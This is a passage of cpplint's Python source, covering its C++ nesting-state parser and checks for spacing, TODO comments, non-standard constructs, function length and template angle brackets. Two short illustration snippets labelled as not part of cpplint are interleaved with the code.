inner_block.open_parentheses == 1 and
_MATCH_ASM.match(line)):
# Enter assembly block
inner_block.inline_asm = _INSIDE_ASM
else:
# Not entering assembly block. If previous line was _END_ASM,
# we will now shift to _NO_ASM state.
inner_block.inline_asm = _NO_ASM
elif (inner_block.inline_asm == _INSIDE_ASM and
inner_block.open_parentheses == 0):
# Exit assembly block
inner_block.inline_asm = _END_ASM
# Consume namespace declaration at the beginning of the line. Do
# this in a loop so that we catch same line declarations like this:
# namespace proto2 { namespace bridge { class MessageSet; } }
while True:
# Match start of namespace. The "\b\s*" below catches namespace
# declarations even if they aren't followed by whitespace, so that
# we don't confuse our namespace checker. The missing spaces will
# be flagged by CheckSpacing.
namespace_decl_match = Match(r'^\s*namespace\b\s*([:\w]+)?(.*)$', line)
if not namespace_decl_match:
break
new_namespace = _NamespaceInfo(namespace_decl_match.group(1), linenum)
self.stack.append(new_namespace)
line = namespace_decl_match.group(2)
if line.find('{') != -1:
new_namespace.seen_open_brace = True
line = line[line.find('{') + 1:]
# Look for a class declaration in whatever is left of the line
# after parsing namespaces. The regexp accounts for decorated classes
# such as in:
# class LOCKABLE API Object {
# };
#
# Templates with class arguments may confuse the parser, for example:
# template <class T
# class Comparator = less<T>,
# class Vector = vector<T> >
# class HeapQueue {
#
# Because this parser has no nesting state about templates, by the
# time it saw "class Comparator", it may think that it's a new class.
# Nested templates have a similar problem:
# template <
# typename ExportedType,
# typename TupleType,
# template <typename, typename> class ImplTemplate>
#
# To avoid these cases, we ignore classes that are followed by '=' or '>'
class_decl_match = Match(
r'\s*(template\s*<[\w\s<>,:]*>\s*)?'
r'(class|struct)\s+([A-Z_]+\s+)*(\w+(?:::\w+)*)'
r'(([^=>]|<[^<>]*>)*)$', line)
if (class_decl_match and
(not self.stack or self.stack[-1].open_parentheses == 0)):
self.stack.append(_ClassInfo(
class_decl_match.group(4), class_decl_match.group(2),
clean_lines, linenum))
line = class_decl_match.group(5)
# If we have not yet seen the opening brace for the innermost block,
# run checks here.
if not self.SeenOpenBrace():
self.stack[-1].CheckBegin(filename, clean_lines, linenum, error)
# Update access control if we are inside a class/struct
if self.stack and isinstance(self.stack[-1], _ClassInfo):
access_match = Match(r'\s*(public|private|protected)\s*:', line)
if access_match:
self.stack[-1].access = access_match.group(1)
# Consume braces or semicolons from what's left of the line
while True:
# Match first brace, semicolon, or closed parenthesis.
matched = Match(r'^[^{;)}]*([{;)}])(.*)$', line)
if not matched:
break
token = matched.group(1)
if token == '{':
# If namespace or class hasn't seen an opening brace yet, mark
# namespace/class head as complete. Push a new block onto the
# stack otherwise.
if not self.SeenOpenBrace():
self.stack[-1].seen_open_brace = True
else:
self.stack.append(_BlockInfo(True))
if _MATCH_ASM.match(line):
self.stack[-1].inline_asm = _BLOCK_ASM
elif token == ';' or token == ')':
# If we haven't seen an opening brace yet, but we already saw
# a semicolon, this is probably a forward declaration. Pop
# the stack for these.
#
# Similarly, if we haven't seen an opening brace yet, but we
# already saw a closing parenthesis, then these are probably
# function arguments with extra "class" or "struct" keywords.
# Also pop the stack for these.
if not self.SeenOpenBrace():
self.stack.pop()
else: # token == '}'
# Perform end of block checks and pop the stack.
if self.stack:
self.stack[-1].CheckEnd(filename, clean_lines, linenum, error)
self.stack.pop()
line = matched.group(2)
def InnermostClass(self):
"""Get class info on the top of the stack.
Returns:
A _ClassInfo object if we are inside a class, or None otherwise.
"""
for i in range(len(self.stack), 0, -1):
classinfo = self.stack[i - 1]
if isinstance(classinfo, _ClassInfo):
return classinfo
return None
def CheckClassFinished(self, filename, error):
"""Checks that all classes have been completely parsed.
Call this when all lines in a file have been processed.
Args:
filename: The name of the current file.
error: The function to call with any errors found.
"""
# Note: This test can result in false positives if #ifdef constructs
# get in the way of brace matching. See the testBuildClass test in
# cpplint_unittest.py for an example of this.
for obj in self.stack:
if isinstance(obj, _ClassInfo):
error(filename, obj.starting_linenum, 'build/class', 5,
'Failed to find complete declaration of class %s' %
obj.name)
def CheckForNonStandardConstructs(filename, clean_lines, linenum,
nesting_state, error):
"""Logs an error if we see certain non-ANSI constructs ignored by gcc-2.
Complain about several constructs which gcc-2 accepts, but which are
not standard C++. Warning about these in lint is one way to ease the
transition to new compilers.
- put storage class first (e.g. "static const" instead of "const static").
- "%lld" instead of %qd" in printf-type functions.
- "%1$d" is non-standard in printf-type functions.
- "\%" is an undefined character escape sequence.
- text after #endif is not allowed.
- invalid inner-style forward declaration.
- >? and <? operators, and their >?= and <?= cousins.
Additionally, check for constructor/destructor style violations and reference
members, as it is very convenient to do so while checking for
gcc-2 compliance.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
nesting_state: A _NestingState instance which maintains information about
the current stack of nested blocks being parsed.
error: A callable to which errors are reported, which takes 4 arguments:
filename, line number, error level, and message
"""
# Remove comments from the line, but leave in strings for now.
line = clean_lines.lines[linenum]
if Search(r'printf\s*\(.*".*%[-+ ]?\d*q', line):
error(filename, linenum, 'runtime/printf_format', 3,
'%q in format strings is deprecated. Use %ll instead.')
if Search(r'printf\s*\(.*".*%\d+\$', line):
error(filename, linenum, 'runtime/printf_format', 2,
'%N$ formats are unconventional. Try rewriting to avoid them.')
# Remove escaped backslashes before looking for undefined escapes.
line = line.replace('\\\\', '')
if Search(r'("|\').*\\(%|\[|\(|{)', line):
error(filename, linenum, 'build/printf_format', 3,
'%, [, (, and { are undefined character escapes. Unescape them.')
# For the rest, work with both comments and strings removed.
line = clean_lines.elided[linenum]
if Search(r'\b(const|volatile|void|char|short|int|long'
r'|float|double|signed|unsigned'
r'|schar|u?int8|u?int16|u?int32|u?int64)'
r'\s+(register|static|extern|typedef)\b',
line):
error(filename, linenum, 'build/storage_class', 5,
'Storage class (static, extern, typedef, etc) should be first.')
if Match(r'\s*#\s*endif\s*[^/\s]+', line):
error(filename, linenum, 'build/endif_comment', 5,
'Uncommented text after #endif is non-standard. Use a comment.')
if Match(r'\s*class\s+(\w+\s*::\s*)+\w+\s*;', line):
error(filename, linenum, 'build/forward_decl', 5,
'Inner-style forward declarations are invalid. Remove this line.')
if Search(r'(\w+|[+-]?\d+(\.\d*)?)\s*(<|>)\?=?\s*(\w+|[+-]?\d+)(\.\d*)?',
line):
error(filename, linenum, 'build/deprecated', 3,
'>? and <? (max and min) operators are non-standard and deprecated.')
if Search(r'^\s*const\s*string\s*&\s*\w+\s*;', line):
# TODO(unknown): Could it be expanded safely to arbitrary references,
# without triggering too many false positives? The first
# attempt triggered 5 warnings for mostly benign code in the regtest, hence
# the restriction.
# Here's the original regexp, for the reference:
# type_name = r'\w+((\s*::\s*\w+)|(\s*<\s*\w+?\s*>))?'
# r'\s*const\s*' + type_name + '\s*&\s*\w+\s*;'
error(filename, linenum, 'runtime/member_string_references', 2,
'const string& members are dangerous. It is much better to use '
'alternatives, such as pointers or simple constants.')
# Everything else in this function operates on class declarations.
# Return early if the top of the nesting stack is not a class, or if
# the class head is not completed yet.
classinfo = nesting_state.InnermostClass()
if not classinfo or not classinfo.seen_open_brace:
return
# The class may have been declared with namespace or classname qualifiers.
# The constructor and destructor will not have those qualifiers.
base_classname = classinfo.name.split('::')[-1]
# Look for single-argument constructors that aren't marked explicit.
# Technically a valid construct, but against style.
args = Match(r'\s+(?:inline\s+)?%s\s*\(([^,()]+)\)'
% re.escape(base_classname),
line)
if (args and
args.group(1) != 'void' and
not Match(r'(const\s+)?%s\s*(?:<\w+>\s*)?&' % re.escape(base_classname),
args.group(1).strip())):
error(filename, linenum, 'runtime/explicit', 5,
'Single-argument constructors should be marked explicit.')
def CheckSpacingForFunctionCall(filename, line, linenum, error):
"""Checks for the correctness of various spacing around function calls.
Args:
filename: The name of the current file.
line: The text of the line to check.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
# Since function calls often occur inside if/for/while/switch
# expressions - which have their own, more liberal conventions - we
# first see if we should be looking inside such an expression for a
# function call, to which we can apply more strict standards.
fncall = line # if there's no control flow construct, look at whole line
for pattern in (r'\bif\s*\((.*)\)\s*{',
r'\bfor\s*\((.*)\)\s*{',
r'\bwhile\s*\((.*)\)\s*[{;]',
r'\bswitch\s*\((.*)\)\s*{'):
match = Search(pattern, line)
if match:
fncall = match.group(1) # look inside the parens for function calls
break
# Except in if/for/while/switch, there should never be space
# immediately inside parens (eg "f( 3, 4 )"). We make an exception
# for nested parens ( (a+b) + c ). Likewise, there should never be
# a space before a ( when it's a function argument. I assume it's a
# function argument when the char before the whitespace is legal in
# a function name (alnum + _) and we're not starting a macro. Also ignore
# pointers and references to arrays and functions because they're too tricky:
# we use a very simple way to recognize these:
# " (something)(maybe-something)" or
# " (something)(maybe-something," or
# " (something)[something]"
# Note that we assume the contents of [] to be short enough that
# they'll never need to wrap.
if ( # Ignore control structures.
not Search(r'\b(if|for|while|switch|return|delete)\b', fncall) and
# Ignore pointers/references to functions.
not Search(r' \([^)]+\)\([^)]*(\)|,$)', fncall) and
# Ignore pointers/references to arrays.
not Search(r' \([^)]+\)\[[^\]]+\]', fncall)):
if Search(r'\w\s*\(\s(?!\s*\\$)', fncall): # a ( used for a fn call
error(filename, linenum, 'whitespace/parens', 4,
'Extra space after ( in function call')
elif Search(r'\(\s+(?!(\s*\\)|\()', fncall):
error(filename, linenum, 'whitespace/parens', 2,
'Extra space after (')
if (Search(r'\w\s+\(', fncall) and
not Search(r'#\s*define|typedef', fncall) and
not Search(r'\w\s+\((\w+::)?\*\w+\)\(', fncall)):
error(filename, linenum, 'whitespace/parens', 4,
'Extra space before ( in function call')
# If the ) is followed only by a newline or a { + newline, assume it's
# part of a control statement (if/while/etc), and don't complain
if Search(r'[^)]\s+\)\s*[^{\s]', fncall):
# If the closing parenthesis is preceded by only whitespaces,
# try to give a more descriptive error message.
if Search(r'^\s+\)', fncall):
error(filename, linenum, 'whitespace/parens', 2,
'Closing ) should be moved to the previous line')
else:
error(filename, linenum, 'whitespace/parens', 2,
'Extra space before )')
def IsBlankLine(line):
"""Returns true if the given line is blank.
We consider a line to be blank if the line is empty or consists of
only white spaces.
Args:
line: A line of a string.
Returns:
True, if the given line is blank.
"""
return not line or line.isspace()
def CheckForFunctionLengths(filename, clean_lines, linenum,
function_state, error):
"""Reports for long function bodies.
For an overview why this is done, see:
http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml#Write_Short_Functions
Uses a simplistic algorithm assuming other style guidelines
(especially spacing) are followed.
Only checks unindented functions, so class members are unchecked.
Trivial bodies are unchecked, so constructors with huge initializer lists
may be missed.
Blank/comment lines are not counted so as to avoid encouraging the removal
of vertical space and comments just to get through a lint check.
NOLINT *on the last line of a function* disables this check.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
function_state: Current function name and lines in body so far.
error: The function to call with any errors found.
"""
lines = clean_lines.lines
line = lines[linenum]
raw = clean_lines.raw_lines
raw_line = raw[linenum]
joined_line = ''
starting_func = False
regexp = r'(\w(\w|::|\*|\&|\s)*)\(' # decls * & space::name( ...
match_result = Match(regexp, line)
if match_result:
# If the name is all caps and underscores, figure it's a macro and
# ignore it, unless it's TEST or TEST_F.
function_name = match_result.group(1).split()[-1]
if function_name == 'TEST' or function_name == 'TEST_F' or (
not Match(r'[A-Z_]+$', function_name)):
starting_func = True
if starting_func:
body_found = False
for start_linenum in range(linenum, clean_lines.NumLines()):
start_line = lines[start_linenum]
joined_line += ' ' + start_line.lstrip()
if Search(r'(;|})', start_line): # Declarations and trivial functions
body_found = True
break # ... ignore
elif Search(r'{', start_line):
body_found = True
function = Search(r'((\w|:)*)\(', line).group(1)
if Match(r'TEST', function): # Handle TEST... macros
parameter_regexp = Search(r'(\(.*\))', joined_line)
if parameter_regexp: # Ignore bad syntax
function += parameter_regexp.group(1)
else:
function += '()'
function_state.Begin(function)
break
if not body_found:
# No body for the function (or evidence of a non-function) was found.
error(filename, linenum, 'readability/fn_size', 5,
'Lint failed to find start of function body.')
elif Match(r'^\}\s*$', line): # function end
function_state.Check(error, filename, linenum)
function_state.End()
elif not Match(r'^\s*$', line):
function_state.Count() # Count non-blank/non-comment lines.
_RE_PATTERN_TODO = re.compile(r'^//(\s*)TODO(\(.+?\))?:?(\s|$)?')
def CheckComment(comment, filename, linenum, error):
"""Checks for common mistakes in TODO comments.
Args:
comment: The text of the comment from the line in question.
filename: The name of the current file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
match = _RE_PATTERN_TODO.match(comment)
if match:
# One whitespace is correct; zero whitespace is handled elsewhere.
leading_whitespace = match.group(1)
if len(leading_whitespace) > 1:
error(filename, linenum, 'whitespace/todo', 2,
'Too many spaces before TODO')
username = match.group(2)
if not username:
error(filename, linenum, 'readability/todo', 2,
'Missing username in TODO; it should look like '
'"// TODO(my_username): Stuff."')
middle_whitespace = match.group(3)
# Comparisons made explicit for correctness -- pylint: disable-msg=C6403
if middle_whitespace != ' ' and middle_whitespace != '':
error(filename, linenum, 'whitespace/todo', 2,
'TODO(my_username) should be followed by a space')
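As a hypothetical standalone illustration (not part of cpplint itself), the TODO pattern above can be exercised directly to show what each capture group carries:

```python
import re

# Standalone copy of _RE_PATTERN_TODO, for illustration only.
# Group 1: whitespace between "//" and "TODO"; group 2: "(username)" if
# present; group 3: the character right after the optional colon.
RE_TODO = re.compile(r'^//(\s*)TODO(\(.+?\))?:?(\s|$)?')

m = RE_TODO.match('//   TODO(alice): fix this')
assert m.group(1) == '   '      # three spaces -> "Too many spaces before TODO"
assert m.group(2) == '(alice)'  # username present, no readability/todo error
assert m.group(3) == ' '        # a single space after the colon is correct

m = RE_TODO.match('// TODO: no username')
assert m.group(2) is None       # triggers "Missing username in TODO"
```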
def CheckAccess(filename, clean_lines, linenum, nesting_state, error):
"""Checks for improper use of DISALLOW* macros.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
nesting_state: A _NestingState instance which maintains information about
the current stack of nested blocks being parsed.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum] # get rid of comments and strings
matched = Match((r'\s*(DISALLOW_COPY_AND_ASSIGN|'
r'DISALLOW_EVIL_CONSTRUCTORS|'
r'DISALLOW_IMPLICIT_CONSTRUCTORS)'), line)
if not matched:
return
if nesting_state.stack and isinstance(nesting_state.stack[-1], _ClassInfo):
if nesting_state.stack[-1].access != 'private':
error(filename, linenum, 'readability/constructors', 3,
'%s must be in the private: section' % matched.group(1))
else:
# Found DISALLOW* macro outside a class declaration, or perhaps it
# was used inside a function when it should have been part of the
# class declaration. We could issue a warning here, but it
# probably resulted in a compiler error already.
pass
def FindNextMatchingAngleBracket(clean_lines, linenum, init_suffix):
"""Find the corresponding > to close a template.
Args:
clean_lines: A CleansedLines instance containing the file.
linenum: Current line number.
init_suffix: Remainder of the current line after the initial <.
Returns:
True if a matching bracket exists.
"""
line = init_suffix
nesting_stack = ['<']
while True:
# Find the next operator that can tell us whether < is used as an
# opening bracket or as a less-than operator. We only want to
# warn on the latter case.
#
# We could also check all other operators and terminate the search
# early, e.g. if we got something like this "a<b+c", the "<" is
# most likely a less-than operator, but then we will get false
# positives for default arguments (e.g. http://go/prccd) and
# other template expressions (e.g. http://go/oxcjq).
match = Search(r'^[^<>(),;\[\]]*([<>(),;\[\]])(.*)$', line)
if match:
# Found an operator, update nesting stack
operator = match.group(1)
line = match.group(2)
if nesting_stack[-1] == '<':
# Expecting closing angle bracket
if operator in ('<', '(', '['):
nesting_stack.append(operator)
elif operator == '>':
nesting_stack.pop()
if not nesting_stack:
# Found matching angle bracket
return True
elif operator == ',':
# Got a comma after a bracket, this is most likely a template
# argument. We have not seen a closing angle bracket yet, but
# it's probably a few lines later if we look for it, so just
# return early here.
return True
else:
# Got some other operator.
return False
else:
# Expecting closing parenthesis or closing bracket
if operator in ('<', '(', '['):
nesting_stack.append(operator)
elif operator in (')', ']'):
# We don't bother checking for matching () or []. If we got
# something like (] or [), it would have been a syntax error.
nesting_stack.pop()
else:
# Scan the next line
linenum += 1
if linenum >= len(clean_lines.elided):
break
line = clean_lines.elided[linenum]
# Exhausted all remaining lines and still no matching angle bracket.
# Most likely the input was incomplete, otherwise we should have
# seen a semicolon and returned early.
return True
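The forward scan above can be condensed into a single-line sketch. `has_matching_close` below is a rough reimplementation for illustration, not cpplint's actual code path: it ignores the multi-line continuation but applies the same stack discipline to decide whether an initial `<` is a template bracket or a less-than operator.

```python
import re

def has_matching_close(suffix):
    """Simplified single-line sketch of the forward angle-bracket scan.

    `suffix` is the text after an initial '<'.  Returns True when the '<'
    plausibly opens a template (matched '>' or a template-style comma),
    False when it looks like a less-than operator.
    """
    stack = ['<']
    line = suffix
    while True:
        match = re.search(r'^[^<>(),;\[\]]*([<>(),;\[\]])(.*)$', line)
        if not match:
            return False  # single-line sketch: no further lines to scan
        op, line = match.group(1), match.group(2)
        if stack[-1] == '<':
            # Expecting a closing angle bracket
            if op in ('<', '(', '['):
                stack.append(op)
            elif op == '>':
                stack.pop()
                if not stack:
                    return True
            elif op == ',':
                return True  # comma inside template arguments
            else:
                return False  # some other operator: likely less-than
        else:
            # Expecting a closing parenthesis or bracket
            if op in ('<', '(', '['):
                stack.append(op)
            elif op in (')', ']'):
                stack.pop()

assert has_matching_close('int> x;')             # vector<int> x;
assert has_matching_close('map<int, int> > m;')  # nested template
assert not has_matching_close('b; return;')      # a<b; -> less-than
```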
def FindPreviousMatchingAngleBracket(clean_lines, linenum, init_prefix):
"""Find the corresponding < that started a template.
Args:
clean_lines: A CleansedLines instance containing the file.
linenum: Current line number.
init_prefix: Part of the current line before the initial >.
Returns:
True if a matching bracket exists.
"""
line = init_prefix
nesting_stack = ['>']
while True:
# Find the previous operator
match = Search(r'^(.*)([<>(),;\[\]])[^<>(),;\[\]]*$', line)
if match:
# Found an operator, update nesting stack
operator = match.group(2)
line = match.group(1)
if nesting_stack[-1] == '>':
# Expecting opening angle bracket
if operator in ('>', ')', ']'):
nesting_stack.append(operator)
elif operator == '<':
nesting_stack.pop()
if not nesting_stack:
# Found matching angle bracket
return True
elif operator == ',':
# Got a comma before a bracket, this is most likely a
# template argument. The opening angle bracket is probably
# there if we look for it, so just return early here.
return True
else:
# Got some other operator.
return False
else:
# Expecting opening parenthesis or opening bracket
if operator in ('>', ')', ']'):
nesting_stack.append(operator)
elif operator in ('(', '['):
nesting_stack.pop()
else:
# Scan the previous line
linenum -= 1
if linenum < 0:
break
line = clean_lines.elided[linenum]
# Exhausted all earlier lines and still no matching angle bracket.
return False
def CheckSpacing(filename, clean_lines, linenum, nesting_state, error):
"""Checks for the correctness of various spacing issues in the code.
Things we check for: spaces around operators, spaces after
if/for/while/switch, no spaces around parens in function calls, two
spaces between code and comment, don't start a block with a blank
line, don't end a function with a blank line, don't add a blank line
after public/protected/private, don't have too many blank lines in a row.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
nesting_state: A _NestingState instance which maintains information about
the current stack of nested blocks being parsed.
error: The function to call with any errors found.
"""
raw = clean_lines.raw_lines
line = raw[linenum]
# Before nixing comments, check if the line is blank for no good
# reason. This includes the first line after a block is opened, and
  # blank lines at the end of a function (i.e., right before a line like '}').
#
# Skip all the blank line checks if we are immediately inside a
# namespace body. In other words, don't issue blank line warnings
# for this block:
# namespace {
#
# }
#
# A warning about missing end of namespace comments will be issued instead.
if IsBlankLine(line) and not nesting_state.InNamespaceBody():
elided = clean_lines.elided
prev_line = elided[linenum - 1]
prevbrace = prev_line.rfind('{')
# TODO(unknown): Don't complain if line before blank line, and line after,
# both start with alnums and are indented the same amount.
# This ignores whitespace at the start of a namespace block
# because those are not usually indented.
if prevbrace != -1 and prev_line[prevbrace:].find('}') == -1:
# OK, we have a blank line at the start of a code block. Before we
# complain, we check if it is an exception to the rule: The previous
# non-empty line has the parameters of a function header that are indented
      # 4 spaces (because they did not fit in an 80-column line when placed on
# the same line as the function name). We also check for the case where
# the previous line is indented 6 spaces, which may happen when the
      # initializers of a constructor do not fit into an 80-column line.
exception = False
if Match(r' {6}\w', prev_line): # Initializer list?
# We are looking for the opening column of initializer list, which
# should be indented 4 spaces to cause 6 space indentation afterwards.
search_position = linenum-2
while (search_position >= 0
and Match(r' {6}\w', elided[search_position])):
search_position -= 1
exception = (search_position >= 0
and elided[search_position][:5] == ' :')
else:
# Search for the function arguments or an initializer list. We use a
# simple heuristic here: If the line is indented 4 spaces; and we have a
# closing paren, without the opening paren, followed by an opening brace
# or colon (for initializer lists) we assume that it is the last line of
# a function header. If we have a colon indented 4 spaces, it is an
# initializer list.
exception = (Match(r' {4}\w[^\(]*\)\s*(const\s*)?(\{\s*$|:)',
prev_line)
or Match(r' {4}:', prev_line))
if not exception:
error(filename, linenum, 'whitespace/blank_line', 2,
'Blank line at the start of a code block. Is this needed?')
# Ignore blank lines at the end of a block in a long if-else
# chain, like this:
# if (condition1) {
# // Something followed by a blank line
#
# } else if (condition2) {
# // Something else
# }
if linenum + 1 < clean_lines.NumLines():
next_line = raw[linenum + 1]
if (next_line
and Match(r'\s*}', next_line)
and next_line.find('} else ') == -1):
error(filename, linenum, 'whitespace/blank_line', 3,
'Blank line at the end of a code block. Is this needed?')
matched = Match(r'\s*(public|protected|private):', prev_line)
if matched:
error(filename, linenum, 'whitespace/blank_line', 3,
'Do not leave a blank line after "%s:"' % matched.group(1))
# Next, we complain if there's a comment too near the text
commentpos = line.find('//')
if commentpos != -1:
# Check if the // may be in quotes. If so, ignore it
# Comparisons made explicit for clarity -- pylint: disable-msg=C6403
if (line.count('"', 0, commentpos) -
line.count('\\"', 0, commentpos)) % 2 == 0: # not in quotes
# Allow one space for new scopes, two spaces otherwise:
if (not Match(r'^\s*{ //', line) and
((commentpos >= 1 and
line[commentpos-1] not in string.whitespace) or
(commentpos >= 2 and
line[commentpos-2] not in string.whitespace))):
error(filename, linenum, 'whitespace/comments', 2,
'At least two spaces is best between code and comments')
# There should always be a space between the // and the comment
commentend = commentpos + 2
      if commentend < len(line) and line[commentend] != ' ':
# but some lines are exceptions -- e.g. if they're big
# comment delimiters like:
# //----------------------------------------------------------
# or are an empty C++ style Doxygen comment, like:
# ///
# or they begin with multiple slashes followed by a space:
# //////// Header comment
match = (Search(r'[=/-]{4,}\s*$', line[commentend:]) or
Search(r'^/$', line[commentend:]) or
Search(r'^/+ ', line[commentend:]))
if not match:
error(filename, linenum, 'whitespace/comments', 4,
'Should have a space between // and comment')
CheckComment(line[commentpos:], filename, linenum, error)
line = clean_lines.elided[linenum] # get rid of comments and strings
# Don't try to do spacing checks for operator methods
  line = re.sub(r'operator(==|!=|<|<<|<=|>=|>>|>)\(', 'operator(', line)
# We allow no-spaces around = within an if: "if ( (a=Foo()) == 0 )".
# Otherwise not. Note we only check for non-spaces on *both* sides;
# sometimes people put non-spaces on one side when aligning ='s among
# many lines (not that this is behavior that I approve of...)
if Search(r'[\w.]=[\w.]', line) and not Search(r'\b(if|while) ', line):
error(filename, linenum, 'whitespace/operators', 4,
'Missing spaces around =')
# It's ok not to have spaces around binary operators like + - * /, but if
# there's too little whitespace, we get concerned. It's hard to tell,
# though, so we punt on this one for now. TODO.
# You should always have whitespace around binary operators.
#
# Check <= and >= first to avoid false positives with < and >, then
# check non-include lines for spacing around < and >.
match = Search(r'[^<>=!\s](==|!=|<=|>=)[^<>=!\s]', line)
if match:
error(filename, linenum, 'whitespace/operators', 3,
'Missing spaces around %s' % match.group(1))
# We allow no-spaces around << when used like this: 10<<20, but
# not otherwise (particularly, not when used as streams)
match = Search(r'(\S)(?:L|UL|ULL|l|ul|ull)?<<(\S)', line)
if match and not (match.group(1).isdigit() and match.group(2).isdigit()):
error(filename, linenum, 'whitespace/operators', 3,
'Missing spaces around <<')
elif not Match(r'#.*include', line):
# Avoid false positives on ->
reduced_line = line.replace('->', '')
# Look for < that is not surrounded by spaces. This is only
# triggered if both sides are missing spaces, even though
    # technically we should flag if at least one side is missing a
# space. This is done to avoid some false positives with shifts.
match = Search(r'[^\s<]<([^\s=<].*)', reduced_line)
if (match and
not FindNextMatchingAngleBracket(clean_lines, linenum, match.group(1))):
error(filename, linenum, 'whitespace/operators', 3,
'Missing spaces around <')
# Look for > that is not surrounded by spaces. Similar to the
# above, we only trigger if both sides are missing spaces to avoid
# false positives with shifts.
match = Search(r'^(.*[^\s>])>[^\s=>]', reduced_line)
if (match and
not FindPreviousMatchingAngleBracket(clean_lines, linenum,
match.group(1))):
error(filename, linenum, 'whitespace/operators', 3,
'Missing spaces around >')
# We allow no-spaces around >> for almost anything. This is because
# C++11 allows ">>" to close nested templates, which accounts for
# most cases when ">>" is not followed by a space.
#
# We still warn on ">>" followed by alpha character, because that is
# likely due to ">>" being used for right shifts, e.g.:
# value >> alpha
#
# When ">>" is used to close templates, the alphanumeric letter that
# follows would be part of an identifier, and there should still be
# a space separating the template type and the identifier.
# type<type<type>> alpha
match = Search(r'>>[a-zA-Z_]', line)
if match:
error(filename, linenum, 'whitespace/operators', 3,
'Missing spaces around >>')
# There shouldn't be space around unary operators
match = Search(r'(!\s|~\s|[\s]--[\s;]|[\s]\+\+[\s;])', line)
if match:
error(filename, linenum, 'whitespace/operators', 4,
'Extra space for operator %s' % match.group(1))
# A pet peeve of mine: no spaces after an if, while, switch, or for
match = Search(r' (if\(|for\(|while\(|switch\()', line)
if match:
error(filename, linenum, 'whitespace/parens', 5,
'Missing space before ( in %s' % match.group(1))
# For if/for/while/switch, the left and right parens should be
# consistent about how many spaces are inside the parens, and
# there should either be zero or one spaces inside the parens.
# We don't want: "if ( foo)" or "if ( foo )".
# Exception: "for ( ; foo; bar)" and "for (foo; bar; )" are allowed.
match = Search(r'\b(if|for|while|switch)\s*'
r'\(([ ]*)(.).*[^ ]+([ ]*)\)\s*{\s*$',
line)
if match:
if len(match.group(2)) != len(match.group(4)):
if not (match.group(3) == ';' and
len(match.group(2)) == 1 + len(match.group(4)) or
not match.group(2) and Search(r'\bfor\s*\(.*; \)', line)):
error(filename, linenum, 'whitespace/parens', 5,
'Mismatching spaces inside () in %s' % match.group(1))
if not len(match.group(2)) in [0, 1]:
error(filename, linenum, 'whitespace/parens', 5,
'Should have zero or one spaces inside ( and ) in %s' %
match.group(1))
# You should always have a space after a comma (either as fn arg or operator)
if Search(r',[^\s]', line):
error(filename, linenum, 'whitespace/comma', 3,
'Missing space after ,')
# You should always have a space after a semicolon
# except for few corner cases
  # TODO(unknown): clarify if 'if (1) { return 1;}' requires one more
# space after ;
if Search(r';[^\s};\\)/]', line):
error(filename, linenum, 'whitespace/semicolon', 3,
'Missing space after ;')
# Next we will look for issues with function calls.
CheckSpacingForFunctionCall(filename, line, linenum, error)
# Except after an opening paren, or after another opening brace (in case of
# an initializer list, for instance), you should have spaces before your
# braces. And since you should never have braces at the beginning of a line,
# this is an easy test.
if Search(r'[^ ({]{', line):
error(filename, linenum, 'whitespace/braces', 5,
'Missing space before {')
# Make sure '} else {' has spaces.
if Search(r'}else', line):
error(filename, linenum, 'whitespace/braces', 5,
'Missing space before else')
# You shouldn't have spaces before your brackets, except maybe after
# 'delete []' or 'new char * []'.
if Search(r'\w\s+\[', line) and not Search(r'delete\s+\[', line):
error(filename, linenum, 'whitespace/braces', 5,
'Extra space before [')
# You shouldn't have a space before a semicolon at the end of the line.
# There's a special case for "for" since the style guide allows space before
# the semicolon there.
if Search(r':\s*;\s*$', line):
error(filename, linenum, 'whitespace/semicolon', 5,
'Semicolon defining empty statement. Use {} instead.')
elif Search(r'^\s*;\s*$', line):
error(filename, linenum, 'whitespace/semicolon', 5,
'Line contains only semicolon. If this should be an empty statement, '
'use {} instead.')
elif (Search(r'\s+;\s*$', line) and
not Search(r'\bfor\b', line)):
error(filename, linenum, 'whitespace/semicolon', 5,
'Extra space before last semicolon. If this should be an empty '
'statement, use {} instead.')
# In range-based for, we wanted spaces before and after the colon, but
# not around "::" tokens that might appear.
  if (Search(r'for *\(.*[^:]:[^: ]', line) or
      Search(r'for *\(.*[^: ]:[^:]', line)):
error(filename, linenum, 'whitespace/forcolon', 2,
'Missing space around colon in range-based for loop')
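The `//`-in-string test near the top of CheckSpacing relies on quote parity: if an even number of unescaped double quotes precedes the `//`, the marker is outside any string literal. `comment_outside_string` below is a hypothetical helper isolating that heuristic, not a cpplint function:

```python
def comment_outside_string(line):
    """Sketch of the quote-parity heuristic: '//' starts a real comment
    only if an even number of unescaped '"' characters precede it."""
    commentpos = line.find('//')
    if commentpos == -1:
        return False
    quotes = (line.count('"', 0, commentpos) -
              line.count('\\"', 0, commentpos))
    return quotes % 2 == 0

assert comment_outside_string('int x = 1;  // a real comment')
assert not comment_outside_string('const char* url = "http://example";')
```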
def CheckSectionSpacing(filename, clean_lines, class_info, linenum, error):
"""Checks for additional blank line issues related to sections.
Currently the only thing checked here is blank line before protected/private.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
    class_info: A _ClassInfo object.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
# Skip checks if the class is small, where small means 25 lines or less.
# 25 lines seems like a good cutoff since that's the usual height of
# terminals, and any class that can't fit in one screen can't really
# be considered "small".
#
# Also skip checks if we are on the first line. This accounts for
# classes that look like
# class Foo { public: ... };
#
# If we didn't find the end of the class, last_line would be zero,
# and the check will be skipped by the first condition.
if (class_info.last_line - class_info.starting_linenum <= 24 or
linenum <= class_info.starting_linenum):
return
matched = Match(r'\s*(public|protected|private):', clean_lines.lines[linenum])
if matched:
# Issue warning if the line before public/protected/private was
# not a blank line, but don't do this if the previous line contains
# "class" or "struct". This can happen two ways:
# - We are at the beginning of the class.
# - We are forward-declaring an inner class that is semantically
# private, but needed to be public for implementation reasons.
# Also ignores cases where the previous line ends with a backslash as can be
# common when defining classes in C macros.
